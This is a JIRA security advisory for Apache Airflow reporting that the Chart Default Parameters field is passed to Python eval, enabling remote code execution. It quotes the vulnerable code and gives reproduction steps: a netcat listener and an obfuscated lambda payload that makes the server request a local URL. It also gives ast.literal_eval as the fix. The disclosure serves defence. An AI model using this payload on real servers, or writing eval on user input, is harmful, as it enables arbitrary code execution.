Rui Wang created AIRFLOW-933:
--------------------------------
Summary: Security - Airflow Use of Eval Allows for Remote Code
Execution
Key: AIRFLOW-933
URL: https://issues.apache.org/jira/browse/AIRFLOW-933
Project: Apache Airflow
Issue Type: Bug
Reporter: Rui Wang
Assignee: Rui Wang
mpact: Any user with the ability to create or edit Charts may execute arbitrary
code on the Airflow server.
Location: The Default Parameters form eld sent when saving a Chart located at
/admin/chart/new/
Description: The Chart functionality allows for the definition of Default
Parameters, which are baseline constraints for the values within a chart.
This data is user-controllable and passed directly to a Python eval, which will
execute code:
def label_link(v, c, m, p):
try:
default_params = eval(m.default_params)
except:
default_params = {}
url = url_for(
'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
**default_params)
return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
Reproduction Steps:
1. Configure a local instance of Airflow, and start a local netcat listener
with the following shell command: nc -l 1337.
2. Access Airflow as a user able to create or edit Charts.
3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
4. In its Default Parameters field, and enter-in the following example payload:
(lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (),
None)[1] for __g['urllib'] in [(__import__('urllib.request', __g,
__g))]][0])(globals())
5. Save the Chart, and observe that the application has made a network request
to your listener, indicating that your code has executed.
Remediation: Use the Python method ast.literal_eval
(https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely
parses its input, rather than executing it as code.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
